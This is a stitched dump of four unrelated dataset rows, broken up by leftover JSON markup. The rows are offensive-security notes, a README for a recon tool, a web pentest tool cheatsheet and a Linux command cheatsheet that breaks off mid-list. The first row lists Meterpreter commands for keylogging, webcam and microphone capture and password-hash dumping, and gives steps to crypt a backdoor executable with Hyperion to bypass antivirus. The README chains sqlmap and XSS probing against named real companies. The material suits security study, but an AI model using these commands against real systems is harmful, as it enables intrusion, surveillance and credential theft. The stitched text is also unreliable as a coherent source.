/usr/share/metasploitframework/modules/exploits/linux/misc/gld\\_postfix.rb ./crossfire.rb \n nano crossfire.rb\n ```\n\n\n- Post Exploitation with Metasploit - (available options depend on OS and Meterpreter Cababilities)\n\n - `download` Download a file or directory \n `upload` Upload a file or directory \n `portfwd` Forward a local port to a remote service \n `route` View and modify the routing table \n `keyscan_start` Start capturing keystrokes \n `keyscan_stop` Stop capturing keystrokes \n `screenshot` Grab a screenshot of the interactive desktop \n `record_mic` Record audio from the default microphone for X seconds \n `webcam_snap` Take a snapshot from the specified webcam \n `getsystem` Attempt to elevate your privilege to that of local system. \n `hashdump` Dumps the contents of the SAM database\n\n- Meterpreter Post Exploitation Features\n\n - Create a Meterpreter background session \n \n `background`\n\nBypassing Antivirus Software \n===========================================================================================================================\n\n- Crypting Known Malware with Software Protectors\n\n - One such open source crypter, called Hyperion \n \n ```bash\n cp /usr/share/windows-binaries/Hyperion-1.0.zip \n unzip Hyperion-1.0.zip \n cd Hyperion-1.0/ \n i686-w64-mingw32-g++ Src/Crypter/*.cpp -o hyperion.exe \n cp -p /usr/lib/gcc/i686-w64-mingw32/5.3-win32/libgcc_s_sjlj-1.dll . \n cp -p /usr/lib/gcc/i686-w64-mingw32/5.3-win32/libstdc++-6.dll . \n wine hyperion.exe ../backdoor.exe ../crypted.exe\n ```\n"}}},{"rowIdx":555,"cells":{"text":{"kind":"string","value":"# Summary\nrecon-bluster is a automated recon tools based on target domain. Combining a set of the best recon tools to enumeration endpoint and generate a target endpoint for further vulnerability scanning. Capable to perform multi-threading for concurrent target recon.\n# Recon Workflow\n![Alt text](images/xmind.png \"recon workflow\")\n# Installation\n```shell\ngit clone https://github.com/superzerosec/recon-bluster.git\ncd recon-bluster\nbash install.sh\n```\n# Usage\n```shell\nusage: recon-bluster.py [-h] [-d DOMAIN] [-l LIST] [-t THREAD] [-i]\n\noptional arguments:\n -h, --help show this help message and exit\n -d DOMAIN, --domain DOMAIN\n Target domain\n -l LIST, --list LIST List of target domain saperated with new line\n -t THREAD, --thread THREAD\n Number of thread, default 5\n -i, --intel Amass intel recon, default False\n```\n\nRecon single target on `tesla.com`\n```shell\npython3 recon-bluster.py -d tesla.com\n```\nFor multiple target in file, create a `list.txt`\n```shell\nbugcrowd.com\ntesla.com\nuber.com\n```\nRecon multiple target on `list.txt`\n```shell\npython3 recon-bluster.py -l list.txt\n```\n# Tools Chaining\n## SQLMAP\n```shell\nTARGET=tesla.com; python3 recon-bluster.py -d $TARGET; sqlmap -m $TARGET/target_sqli.txt --random-agent --batch\n```\n## NUCLEI\n```shell\nTARGET=tesla.com; python3 recon-bluster.py -d $TARGET; nuclei -silent -l $TARGET/subdomains_httpx.txt -jsonl -o $TARGET/subdomains_nuclei_vulnerabilities_$(date +%Y-%m-%d_%H:%M:%S).json -H \"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36\" --severity low,medium,high,critical\n```\n## AIRIXSS\n```shell\nTARGET=tesla.com; python3 recon-bluster.py -d $TARGET; cat $TARGET/target_xss.txt | qsreplace '\">' | airixss -payload '' | grep \"31mVulnerable\" | anew target_xss_airixss.txt\n```\n## SMAP\n```shell\nTARGET=tesla.com; python3 recon-bluster.py -d $TARGET; smap -iL $TARGET/subdomains.txt -oG $TARGET/subdomains_smap.txt\n```\n## WAYMORE\n```shell\nTARGET=tesla.com; python3 ~/tools/waymore/waymore.py -mode U -i $TARGET; cat ~/tools/waymore/results/$TARGET/waymore.txt | anew $TARGET/subdomains_urls_waymore.txt > $TARGET/subdomains_urls_waymore_new.txt\n```\n# Credit\n* [waybackurls](https://github.com/tomnomnom/waybackurls)\n* [assetfinder](https://github.com/tomnomnom/assetfinder)\n* [anew](https://github.com/tomnomnom/anew)\n* [gf](https://github.com/tomnomnom/gf)\n* [qsreplace](https://github.com/tomnomnom/qsreplace)\n* [dnsx](https://github.com/projectdiscovery/dnsx)\n* [httpx](https://github.com/projectdiscovery/httpx)\n* [subfinder](https://github.com/projectdiscovery/subfinder)\n* [OWASP Amass](https://github.com/OWASP/Amass)\n* [gau](https://github.com/lc/gau)\n* [hakrawler](https://github.com/hakluke/hakrawler)\n* [unew](https://github.com/dwisiswant0/unew)\n* [sqlmap](https://github.com/sqlmapproject/sqlmap)\n* [nuclei](https://github.com/projectdiscovery/nuclei)\n* [airixss](https://github.com/ferreiraklet/airixss)\n* [smap](https://github.com/s0md3v/Smap)\n* [uncover](https://github.com/projectdiscovery/uncover)\n* [tlsx](https://github.com/projectdiscovery/tlsx)\n* [katana](https://github.com/projectdiscovery/katana)\n* [waymore](https://github.com/xnl-h4ck3r/waymore)\n# Special Thanks\n* [KingOfBugBountyTips](https://github.com/KingOfBugbounty/KingOfBugBountyTips)\n"}}},{"rowIdx":556,"cells":{"text":{"kind":"string","value":"# Web\n\n- [[PDF] Frogy's Mindmap](https://github.com/iamthefrogy/Web-Application-Pentest-Checklist/raw/main/Frogy%27s%20Mindmap.pdf)\n\n![Pentesting Web Applications Mindmap](https://miro.medium.com/max/2400/1*8lN7TaTnlZSPEikpHFQnuA.png)\n\n\n\n\n## Tools\n\n\n\n### nikto\n\n* [https://github.com/sullo/nikto](https://github.com/sullo/nikto)\n\n```\n$ nikto -h http://127.0.0.1 -Cgidirs all\n```\n\n\n\n### dnsrecon\n\n* [https://github.com/darkoperator/dnsrecon](https://github.com/darkoperator/dnsrecon)\n\nPerform reverse DNS lookup for IPs in subnet `10.10.10.0/24` with a name server at `192.168.1.11`:\n\n```\n$ dnsrecon -r 10.10.10.0/24 -n 192.168.1.11 -d DoesNotMatter\n```\n\n\n\n### gobuster\n\n* [https://github.com/OJ/gobuster/releases](https://github.com/OJ/gobuster/releases)\n* [https://blog.assetnote.io/2021/04/05/contextual-content-discovery/](https://blog.assetnote.io/2021/04/05/contextual-content-discovery/)\n\n```\n$ gobuster dir -ku 'https://127.0.0.1' -w /usr/share/wordlists/dirbuster/directory-list[-lowercase]-2.3-medium.txt -x php,asp,aspx,jsp,ini,config,cfg,xml,htm,html,json,bak,txt -t 50 -a 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0' -s 200,204,301,302,307,401 -o gobuster/127.0.0.1\n$ gobuster dir -ku 'https://127.0.0.1' -w /usr/share/seclists/Discovery/Web-Content/raft-small-words[-lowercase].txt -x php,asp,aspx,jsp,ini,config,cfg,xml,htm,html,json,bak,txt -t 50 -a 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0' -s 200,204,301,302,307,401 -o gobuster/127.0.0.1\n```\n\n\n\n### wfuzz\n\n* [https://github.com/xmendez/wfuzz](https://github.com/xmendez/wfuzz)\n* [https://wfuzz.readthedocs.io/en/latest/](https://wfuzz.readthedocs.io/en/latest/)\n\n```\n$ wfuzz -e encoders\n$ wfuzz -c -u 'http://10.10.13.37/index.php?id=FUZZ' -w /usr/share/seclists/Fuzzing/4-digits-0000-9999.txt -f wfuzz.out --hh 1337\n$ wfuzz -c -u 'http://10.10.13.37' --basic 'FUZZ:FUZ2Z' -w /usr/share/seclists/Usernames/top-usernames-shortlist.txt -w /usr/share/seclists/Passwords/Common-Credentials/top-20-common-SSH-passwords.txt --hc 1337\n```\n\n\n\n### ffuf\n\n* [https://github.com/ffuf/ffuf](https://github.com/ffuf/ffuf)\n* [https://codingo.io/tools/ffuf/bounty/2020/09/17/everything-you-need-to-know-about-ffuf.html](https://codingo.io/tools/ffuf/bounty/2020/09/17/everything-you-need-to-know-about-ffuf.html)\n\n\n\n### aquatone\n\n* [https://github.com/michenriksen/aquatone/releases](https://github.com/michenriksen/aquatone/releases)\n* [https://github.com/BishopFox/eyeballer](https://github.com/BishopFox/eyeballer)\n\nDefault ports:\n\n```\n$ cat targets.txt | ./aquatone -ports 80,443,8000,8080,8443 -out 10.0-255.0-255.0-255\n$ cat targets.txt | ./aquatone -ports xlarge -out 10.0-255.0-255.0-255\n```\n\nFrom Nmap XML:\n\n```\n$ ports=`cat nmap/tcp.gnmap | grep -ioP '\\d+/open/tcp//http' | awk -F/ '{print $1}' | sort -u | awk 1 ORS=',' | sed 's/.$//'`\n$ cat targets.txt | ./aquatone -ports $ports -out 10.0-255.0-255.0-255_nmap\nOr\n$ cat nmap/tcp.xml | ./aquatone -nmap -out 10.0-255.0-255.0-255_nmap\n```\n\n\n\n### amass\n\n* [https://github.com/OWASP/Amass/releases](https://github.com/OWASP/Amass/releases)\n\n{% embed url=\"https://snovvcrash.github.io/2020/05/10/subdomain-discovery.html\" caption=\"Об обнаружении субдоменов\" %}\n\n```\n$ amass intel -active -config config.ini -whois -df domains.txt -ipv4 -src -v -o intel.out\n$ amass enum -active -brute -config config.ini -df domains.txt -ipv4 -src -v -o enum.out\n```\n\n\n\n### subfinder\n\n* [https://github.com/projectdiscovery/subfinder/releases](https://github.com/projectdiscovery/subfinder/releases)\n\n```\n$ subfinder -all -config config.yaml -d hackerone.com -o subdomains.txt [-oI -nW]\n```\n\n\n\n### shuffledns\n\n* [https://github.com/projectdiscovery/shuffledns/releases](https://github.com/projectdiscovery/shuffledns/releases)\n\n```\n$ shuffledns -d hackerone.com -r /opt/dnsvalidator/resolvers.txt -w /usr/share/commonspeak2-wordlists/subdomains/subdomains.txt -o subdomains.txt -t 500\n```\n\n\n\n### massdns\n\n* [https://github.com/blechschmidt/massdns](https://github.com/blechschmidt/massdns)\n* [https://github.com/vortexau/dnsvalidator](https://github.com/vortexau/dnsvalidator)\n\n```\n$ massdns -r /opt/dnsvalidator/resolvers.txt domains.txt -w domains-resolved.txt -o S\n```\n\n\n\n### dnsx\n\n- [https://github.com/projectdiscovery/dnsx](https://github.com/projectdiscovery/dnsx)\n\n```\n$ dnsx -l dns.txt -resp -a -aaaa -cname -mx -ns -soa -txt\n$ dnsx -d megacorp.local -r 192.168.0.11,192.168.0.22 -w /usr/share/seclists/Discovery/DNS/... -a -t 25 -o ~/ws/log/dnsx.log -silent\n```\n\n\n\n### chaos\n\n* [https://github.com/projectdiscovery/chaos-client](https://github.com/projectdiscovery/chaos-client)\n\n```\n$ chaos -d megacorp.com -key -http-status-code -http-title -http-url -o chaos.out\n```\n\n\n\n### httpx\n\n* [https://github.com/projectdiscovery/httpx/releases](https://github.com/projectdiscovery/httpx/releases)\n\n```\n$ httpx -l domains.txt -vhost -http2 -pipeline -title -content-length -status-code -follow-redirects -tls-probe -content-type -location -csp-probe -web-server -stats -ip -cname -cdn -ports 80,81,300,443,591,593,832,981,1010,1311,2082,2087,2095,2096,2480,3000,3128,3333,4243,4567,4711,4712,4993,5000,5104,5108,5800,6543,7000,7396,7474,8000,8001,8008,8014,8042,8069,8080,8081,8088,8090,8091,8118,8123,8172,8222,8243,8280,8281,8333,8443,8500,8834,8880,8888,8983,9000,9043,9060,9080,9090,9091,9200,9443,9800,9981,12443,16080,18091,18092,20720,28017 -threads 300 -o httpx.out\n```\n\n\n\n### katana\n\n- [https://github.com/projectdiscovery/katana](https://github.com/projectdiscovery/katana/releases)\n- [https://github.com/CristiVlad25/scripts/blob/master/kata.sh](https://github.com/CristiVlad25/scripts/blob/master/kata.sh)\n\n```\n$ katana -u https://megacorp.com/ -hl -nos -jc -silent -aff -kf all,robotstxt,sitemapxml -c 150 -fs fqdn | subjs | jsa.py | goverview probe -N -c 500 | sort -u -t';' -k2,14 | cut -d';' -f1\n```\n\n\n\n### interactsh\n\n- [https://github.com/projectdiscovery/interactsh](https://github.com/projectdiscovery/interactsh)\n\nSelf-hosted:\n\n```\n$ interactsh-client -server example.com -token '1337t0k3n' -o interactsh.log -sf interactsh.session -asn -v\n```\n\n\n\n### nuclei\n\n- [https://blog.projectdiscovery.io/ultimate-nuclei-guide/](https://blog.projectdiscovery.io/ultimate-nuclei-guide/)\n\n{% embed url=\"https://twitter.com/reconone_/status/1540666730829082624\" %}\n\n* [https://github.com/projectdiscovery/nuclei/releases](https://github.com/projectdiscovery/nuclei/releases)\n* [https://github.com/DingyShark/nuclei-scan-sort](https://github.com/DingyShark/nuclei-scan-sort)\n\n```\n$ nuclei -update-templates\n$ nuclei -l domains.txt [-t cves] -o nuclei.out\n```\n\nSort results:\n\n```bash\n# Manually\ncat nuclei.out | grep -v info | grep '\\] \\[' | sort -k3\n# Automated\ncurl -sSL \"https://github.com/DingyShark/nuclei-scan-sort/raw/main/nuclei_sort.py\" -o nuclei_sort.py\nsed -i '1 i #!/usr/bin/env python3' nuclei_sort.py\nchmod +x nuclei_sort.py\npython3 nuclei_sort.py -i nuclei.out | grep -v info | grep . --color=none\n```\n\nSSL / TLS:\n\n```\n$ nuclei -l domains.txt -t ssl -o nuclei_ssl.out | tee nuclei_ssl.tee\n$ cat nuclei_ssl.out | grep -e deprecated-tls -e detect-ssl -e expired-ssl -e mismatched-ssl -e self-signed -e weak-cipher | sort -u\n```\n\nUsing [tlsx](https://github.com/projectdiscovery/tlsx/releases):\n\n```\n$ das -db corp parse https -raw | tlsx -ex -ss -mm -re -o tlsx.out\n```\n\nWeb scan against a large scope:\n\n```\n$ nuclei -l targets.txt -ni -eid 'xss-deprecated-header-detect,http-missing-security-headers,addeventlistener-detect,cname-fingerprint,mx-fingerprint,txt-fingerprint,nameserver-fingerprint,options-method,tls-version,deprecated-tls,waf-detect,dns-waf-detect,tech-detect,robots-txt-endpoint,mx-service-detector,weak-cipher-suites,mismatched-ssl,ssl-issuer,ssl-dns-names,mismatched-ssl-certificate' -etags network,xss -o nuclei_web.out | tee nuclei_web.tee\n```\n\nNetwork scan against a large scope:\n\n```\nnuclei -l targets.txt -eid 'xss-deprecated-header-detect,http-missing-security-headers,addeventlistener-detect,cname-fingerprint,mx-fingerprint,txt-fingerprint,nameserver-fingerprint,options-method,tls-version,deprecated-tls,waf-detect,dns-waf-detect,tech-detect,robots-txt-endpoint,mx-service-detector,weak-cipher-suites,mismatched-ssl,ssl-issuer,ssl-dns-names,mismatched-ssl-certificate' -etags xss -o nuclei_network.out -iserver example.com -itoken '1337t0K3n' | tee nuclei_network.tee\n```\n"}}},{"rowIdx":557,"cells":{"text":{"kind":"string","value":"![visitor badge](https://visitor-badge.glitch.me/badge?page_id=shreyaschavhan.linux-commands-cheatsheet&left_text=Views)\n\n# ⁍ 𝐋𝐢𝐧𝐮𝐱 𝐂𝐨𝐦𝐦𝐚𝐧𝐝𝐬 𝐂𝐡𝐞𝐚𝐭𝐬𝐡𝐞𝐞𝐭\n\n- `gnome-control-center` : open system settings from terminal\n- `xclip -selection clipboard` : to copy output directly to clipboard\n\nCommand | Usage \n:-: | ---\n`ssh` | ssh (SSH client) is a program for logging into a remote machine and for executing commands on a remote machine. \n`ls` | List information about the FILEs (the current directory by default).\n`cd` | Change Directory\n`cat` | Concatenate files and print on the standard output\n`file` | determine file type\n`du` | estimate file space usage\n`find`| search for files in a directory hierarchy\n`grep` | print lines that match patterns\n`sort` | sort lines of text files\n`uniq` | report or omit repeated lines\n`strings` | print the sequences of printable characters in files\n`base64` | base64 encode/decode data and print to standard output\n`tr` | Translate, squeeze, and/or delete characters from standard input, writing to standard output.\n`tar` | an archiving utility\n`gzip` | compress or expand files\n`bzip2` | a block-sorting file compressor\n`xxd` | make a hexdump or do the reverse.\n`mkdir` | make directories\n`cp` | copy files and directories\n`mv` | move files and directories\n`telnet` | The telnet command is used for interactive communication with another host using the TELNET protocol\n`nc` | netcat is a simple unix utility which reads and writes data across network connections, using TCP or UDP protocol.\n`openssl` | OpenSSL command line tool\n`s_client` | The s_client command implements a generic SSL/TLS client which connects to a remote host using SSL/TLS. It is a very useful diagnostic tool for SSL servers.\n`nmap` | Network exploration tool and security / port scanner\n`diff` | compare files line by line\n`bash` | Bash is an sh-compatible command language interpreter\n`screen` | Screen is a full-screen window manager that multiplexes a physical terminal between several processes\n`tmux` | tmux is a terminal multiplexer: it enables a number of terminals to be created, accessed, and controlled from a single screen. \n`bg` | background a process\n`fg` | foreground a process\n`jobs` | list processes running in background\n`&` | run a command in background\n`cron` | daemon to execute scheduled commands\n`crontab` | maintain crontab files for individual users\n`crontab(5)` | tables for driving cron\n`more` | file perusal filter for crt viewing\n`less` | opposite of more\n`vi` | vim - Vi IMproved, a programmer's text editor\n`id` | print real and effective user and group IDs\n`pwd` | print working directory\n`git` | the stupid content tracker\n`locate` | find files by name, quickly\n`man` | an interface to the system reference manuals\n`which` | locate a command\n`type` | lets you query the type of each command.\n`ps` | report a snapshot of the current processes.\n`kill` | send a signal to a process\n`uname` | print system information \n`chmod` | change file mode bits\n`chown` | change file owner and group\n`chgrp` | change group ownership\n`tail` | output the last part of files\n`ln` | make link between files\n\n---\n\n> - `cat ./-` (./ - stands for current directory) : cat a file with name \"-\"\n> - `cat ./-filename` : cat a file whose name starts with \"-\" \n> - `cat \\spaces \\in \\this \\filename.txt` (Original filename: `spaces in this filename.txt` ) - cat a file name with spaces\n> - `base64 -d data.txt` - base64 decode a file\n> - `strings filename` - output human readable text from non-humanreadable file: \n> - `echo \"acbdlksjfla KHLKJfdlsfasd\" | tr 'A-Za-z' 'N-ZA-Mn-za-m'` - rotate a text with all lowercase and uppercase by 13 positions: \n> - `openssl s_client -connect :` : connect a host with ssl encryption\n> - `diff fileone filetwo` : check difference\n> - `tail -n ` : print last n lines of a file\n> - `ln -s tmp/files/take-the-command-challenge take-the-command-challenge` : Create a symbolic link named take-the-command-challenge that points to the file tmp/files/take-the-command-challenge.\n> - `find . -delete` : Delete all of the files in this challenge directory including all subdirectories and their contents.\n> - `grep -rl 500`: `-r` for Recursive, read all files in given directory and subdirectories & `-l` for Print the name of each file which contains a match.\n> \n\n-----\n\n`Note: These are my notes for personal reference!`\n\n\n\n## 𝐁𝐚𝐬𝐢𝐜\n\n- `date` : displays the current time and date\n```\n┌──(shreyas㉿kali)-[~]\n└─$ date\nTuesday 04 January 2022 03:39:43 PM IST\n``` \n\n---\n\n- `cal` : displays a calendar of the current month\n```\n┌──(shreyas㉿kali)-[~]\n└─$ cal \n January 2022 \nSu Mo Tu We Th Fr Sa \n 1 \n 2 3 4 5 6 7 8 \n 9 10 11 12 13 14 15 \n16 17 18 19 20 21 22 \n23 24 25 26 27 28 29 \n30 31 \n\n```\n---\n\n- `df` : the current amount of free space on our disk drives\n```\n┌──(shreyas㉿kali)-[~]\n└─$ df \nFilesystem 1K-blocks Used Available Use% Mounted on\nudev 1953436 0 1953436 0% /dev\ntmpfs 399160 1168 397992 1% /run\n/dev/sda1 130538556 11247868 112613492 10% /\ntmpfs 1995784 0 1995784 0% /dev/shm\ntmpfs 5120 0 5120 0% /run/lock\ntmpfs 399156 68 399088 1% /run/user/1000\n \n```\n---\n- `free` : display the amount of free memory\n```\n┌──(shreyas㉿kali)-[~]\n└─$ free \n total used free shared buff/cache available\nMem: 3991568 672232 2753624 8864 565712 3079888\nSwap: 998396 0 998396\n \n```\n---\n\n## 𝐍𝐚𝐯𝐢𝐠𝐚𝐭𝐢𝐨𝐧\n\n- `pwd` : print working directory\n```\n┌──(shreyas㉿kali)-[~]\n└─$ pwd \n/home/shreyas\n \n```\n---\n\n- `cd` : change directory\n```\n┌──(shreyas㉿kali)-[~]\n└─$ cd practise \n \n┌──(shreyas㉿kali)-[~/practise]\n└─$ pwd\n/home/shreyas/practise\n \n┌──(shreyas㉿kali)-[~/practise]\n└─$ ls \nhackthebox\n\n```\n---\n\n- `cd` shortcuts\n\nShortcut | Result\n---|---\ncd | Changes the working directory to your home directory.\ncd - | Changes the working directory to the previous working directory.\ncd ~user_name | Changes the working directory to the home directory of user_name. For example, typing cd ~bob will change the directory to the home directory of user “bob.”\n\n---\n\n- `ls` : List directory contents\n> - `ls -l`: output in long format\n> - `ls -t`: the t option to sort the result by the file’s modification time.\n> - `ls -lt --reverse`: --reverse to reverse the order of the sort.\n```\n┌──(shreyas㉿kali)-[~]\n└─$ ls\nBugBounty Documents Music practise Templates\nDesktop Downloads Pictures Public Videos\n \n┌──(shreyas㉿kali)-[~]\n└─$ ls /usr \nbin games include lib lib32 lib64 libexec libx32 local sbin share src\n \n┌──(shreyas㉿kali)-[~]\n└─$ ls practise /usr\npractise:\nhackthebox\n\n/usr:\nbin games include lib lib32 lib64 libexec libx32 local sbin share src\n \n┌──(shreyas㉿kali)-[~]\n└─$ ls -l \ntotal 176\ndrwxr-xr-x 3 shreyas shreyas 4096 Jan 1 17:38 BugBounty\ndrwxr-xr-x 2 shreyas shreyas 4096 Dec 14 19:34 Desktop\ndrwxr-xr-x 2 shreyas shreyas 4096 Dec 14 19:34 Documents\ndrwxr-xr-x 3 shreyas shreyas 4096 Dec 29 15:32 Downloads\ndrwxr-xr-x 2 shreyas shreyas 4096 Dec 14 19:34 Music\ndrwxr-xr-x 2 shreyas shreyas 4096 Dec 14 19:34 Pictures\ndrwxr-xr-x 3 shreyas shreyas 4096 Dec 26 21:40 practise\ndrwxr-xr-x 2 shreyas shreyas 4096 Dec 14 19:34 Public\ndrwxr-xr-x 2 shreyas shreyas 4096 Dec 14 19:34 Templates\ndrwxr-xr-x 2 shreyas shreyas 4096 Dec 14 19:34 Videos\n\n \n┌──(shreyas㉿kali)-[~]\n└─$ ls -lt\ntotal 40\ndrwxr-xr-x 3 shreyas shreyas 4096 Jan 1 17:38 BugBounty\ndrwxr-xr-x 3 shreyas shreyas 4096 Dec 29 15:32 Downloads\ndrwxr-xr-x 3 shreyas shreyas 4096 Dec 26 21:40 practise\ndrwxr-xr-x 2 shreyas shreyas 4096 Dec 14 19:34 Desktop\ndrwxr-xr-x 2 shreyas shreyas 4096 Dec 14 19:34 Documents\ndrwxr-xr-x 2 shreyas shreyas 4096 Dec 14 19:34 Music\ndrwxr-xr-x 2 shreyas shreyas 4096 Dec 14 19:34 Pictures\ndrwxr-xr-x 2 shreyas shreyas 4096 Dec 14 19:34 Public\ndrwxr-xr-x 2 shreyas shreyas 4096 Dec 14 19:34 Templates\ndrwxr-xr-x 2 shreyas shreyas 4096 Dec 14 19:34 Videos\n\n \n┌──(shreyas㉿kali)-[~]\n└─$ ls -lt --reverse 2 ⨯\ntotal 40\ndrwxr-xr-x 2 shreyas shreyas 4096 Dec 14 19:34 Videos\ndrwxr-xr-x 2 shreyas shreyas 4096 Dec 14 19:34 Templates\ndrwxr-xr-x 2 shreyas shreyas 4096 Dec 14 19:34 Public\ndrwxr-xr-x 2 shreyas shreyas 4096 Dec 14 19:34 Pictures\ndrwxr-xr-x 2 shreyas shreyas 4096 Dec 14 19:34 Music\ndrwxr-xr-x 2 shreyas shreyas 4096 Dec 14 19:34 Documents\ndrwxr-xr-x 2 shreyas shreyas 4096 Dec 14 19:34 Desktop\ndrwxr-xr-x 3 shreyas shreyas 4096 Dec 26 21:40 practise\ndrwxr-xr-x 3 shreyas shreyas 4096 Dec 29 15:32 Downloads\ndrwxr-xr-x 3 shreyas shreyas 4096 Jan 1 17:38 BugBounty\n \n```\n---\n\n- `file filename` : the file command will print a brief description of the file’s contents\n```\n┌──(shreyas㉿kali)-[~/practise/hackthebox]\n└─$ file flag.txt \nflag.txt: ASCII text, with no line terminators\n \n┌──(shreyas㉿kali)-[~/practise/hackthebox]\n└─$ file pack.ovpn \npack.ovpn: ASCII text\n\n```\n---\n\n- `less` : allows us to scroll forward and backward through a text file.\n - `Note: less is more. Means both commands are same` \n```\n┌──(shreyas㉿kali)-[~/practise/hackthebox]\n└─$ cat example | less\n \n┌──(shreyas㉿kali)-[~/practise/hackthebox]\n└─$ less example\n```\n\nCommand | Action\n--- | ---\n`PAGE UP` or `b` | Scroll back one page\n`PAGE DOWN` or `space` | Scroll forward one page\n`Up arrow` | Scroll up one line\n`Down arrow` | Scroll down one line\n`G` | Move to the end of the text file\n`1G` or `g` | Move to the beginning of the text file\n`/characters` | Search forward to the next occurrence of characters\n`n` | Search for the next occurrence of the previous search\n`h` | Display help screen\n`q` | Quit less\n\n\n---\n\n## 𝐌𝐚𝐧𝐢𝐩𝐮𝐥𝐚𝐭𝐢𝐧𝐠 𝐟𝐢𝐥𝐞𝐬 𝐚𝐧𝐝 𝐝𝐢𝐫𝐞𝐜𝐭𝐨𝐫𝐢𝐞𝐬\n\n- Wildcards:\n\nWildcards | Meaning\n--- | ---\n`*` | Matches any character\n`?` | Matches any single character\n`[characters]` | Matches any character that is a member of the set characters\n`[!characters]` | Matches any character that is not a member of the set characters\n`[:class:]]` | Matches any character that is member of the specified class\n\n- List of most commonly used character classes\n\nCharacter class | Meaning\n--- | ---\n`[:alnum:]` | Matches any alphanumeric character\n`[:alpha:]` | Matches any alphabetic characters\n`[:digit:]` | Matches any numerical\n`[:lower:]` | Matches any lowercase letter\n`[:upper:]` | Matches any uppercase\n\n\n- Wildcard examples:\n\nPattern | Matches\n--- | ---\n`*` | All files\n`g*` | Any file beginning with g\n`b*.txt` | Any file beginning with b followed by any characters and ending with .txt\n`Data???` | Any file beginning with Data followed by exactly three characters\n`[abc]*` | \tAny file beginning with either an a, a b, or a c\n`BACKUP.[0-9][0-9][0-9]` | Any file beginning with BACKUP. followed by exactly three numerals\n`[[:upper:]]*` | Any file beginning with an uppercase letter\n`[![:digit:]]*` | Any file not beginning with a numeral\n`*[[:lower:]123]` | Any file ending with a lowercase letter or the numerals 1, 2, or 3\n\n- `Wildcards can be used with any command that accepts filenames as arguments`\n\n---\n\n- `mkdir` - make directory\n - `mkdir dir` - single directory\n - `mkdir dir1 dir2 dir3` - multiple directories\n \n \n```\n┌──(shreyas㉿kali)-[~/practise]\n└─$ mkdir commandline\n \n┌──(shreyas㉿kali)-[~/practise]\n└─$ ls \ncommandline hackthebox\n\n┌──(shreyas㉿kali)-[~/practise/commandline]\n└─$ mkdir dir1 dir2 dir3\n \n┌──(shreyas㉿kali)-[~/practise/commandline]\n└─$ ls\ndir1 dir2 dir3\n\n```\n---\n\n- `cp` - copy files and directories\n - `cp item1 item2` : copy single file item1 into item2\n - `cp item... directory` : copies multiple items (either files or directories) into a directory.\n\nOption | Meaning\n--- | ---\n`-a`,`--archive` | Copy the files and directories and all of their attributes, including ownerships and permissions.\n`-i`, `--interactive` | Before overwriting an existing file, prompt the user for confirmation. \n`-r`, `--recursive` | Recursively copy directories and their contents. This option (or the -a option) is required when copying directories.\n`-u`, `--update` | When copying files from one directory to another, only copy files that either don’t exist or are newer than the existing corresponding files in the destination directory. This is useful when copying large numbers of files as it skips files that don’t need to be copied\n`-v`, `--verbose` | Display informative messages as the copy is performed.\n\n- `mv` is same as `cp`\n\n---\n\n- `rm file` : remove files and directories\n\n\nOption | Meaning\n--- | ---\n`-i`, `--interactive` | Before deleting an existing file, prompt the user for confirmation.\n`-r`, `--recursive` | Recursively delete directories. This means that if a directory being deleted has subdirectories, delete them too. To delete a directory, this option must be specified.\n`-f`, `--force` | Ignore nonexistent files and do not prompt. This overrides the --interactive option.\n`-v`, `--verbose` | Display informative messages as the deletion is performed.\n\n---\n\n- `ln` : create links\n - `ln file link` : create a hard link\n - `ln -s item link` : creates a symbolic link\n\n---\n\n## 𝐖𝐨𝐫𝐤𝐢𝐧𝐠 𝐰𝐢𝐭𝐡 𝐜𝐨𝐦𝐦𝐚𝐧𝐝𝐬\n\n- `type`: is a shell builtin that displays the kind of command the shell will execute\n\n```\n┌──(shreyas㉿kali)-[~/practise/commandline]\n└─$ type ls \nls is an alias for ls --color=auto\n \n┌──(shreyas㉿kali)-[~/practise/commandline]\n└─$ type ssh\nssh is /usr/bin/ssh\n \n┌──(shreyas㉿kali)-[~/practise/commandline]\n└─$ type cd \ncd is a shell builtin\n \n```\n---\n\n- `which` : Display an Executable’s Location\n\n```\n┌──(shreyas㉿kali)-[~/practise/commandline]\n└─$ which ls \nls: aliased to ls --color=auto\n \n┌──(shreyas㉿kali)-[~/practise/commandline]\n└─$ which pwd\npwd: shell built-in command\n \n┌──(shreyas㉿kali)-[~/practise/commandline]\n└─$ which cd \ncd: shell built-in command\n \n┌──(shreyas㉿kali)-[~/practise/commandline]\n└─$ which gedit\n/usr/bin/gedit\n \n┌──(shreyas㉿kali)-[~/practise/commandline]\n└─$ which firefox\n/usr/bin/firefox\n \n```\n\n---\n\n- `man` : Display a Program’s Manual Page\n\n```\n┌──(shreyas㉿kali)-[~/practise/commandline]\n└─$ man ls \n```\n\n```\nLS(1) User Commands LS(1)\n\nNAME\n ls - list directory contents\n\nSYNOPSIS\n ls [OPTION]... [FILE]...\n\nDESCRIPTION\n List information about the FILEs (the current directory by default). Sort\n entries alphabetically if none of -cftuvSUX nor --sort is specified.\n\n Mandatory arguments to long options are mandatory for short options too.\n\n -a, --all\n do not ignore entries starting with .\n\n -A, --almost-all\n do not list implied . and ..\n\n --author\n with -l, print the author of each file\n\n Manual page ls(1) line 1 (press h for help or q to quit)\n\n```\n\n---\n\n- `apropos` - Display Appropriate Commands\n\n```\n┌──(shreyas㉿kali)-[~/practise/commandline]\n└─$ apropos copy \ncifsdd (8) - convert and copy a file over SMB\nCOPY (7) - copy data between a file and a table\ncp (1) - copy files and directories\ncpgr (8) - copy with locking the given file to the password or group file\ncpio (1) - copy files to and from archives\ncppw (8) - copy with locking the given file to the password or group file\ndd (1) - convert and copy a file\ndebconf-copydb (1) - copy a debconf database\ngit-checkout-index (1) - Copy files from the index to the working tree\ngvfs-copy (1) - Deprecated equivalent of gio copy\ninstall (1) - copy files and set attributes\nmariadb-hotcopy (1) - a database backup program\nmysqlhotcopy (1) - a database backup program\nntfscp (8) - copy file to an NTFS volume.\nobjcopy (1) - copy and translate object files\nptrepack (1) - Copy any PyTables Leaf, Group or complete subtree into anothe...\nrcp (1) - OpenSSH secure file copy\nrsync (1) - a fast, versatile, remote (and local) file-copying tool\nscp (1) - OpenSSH secure file 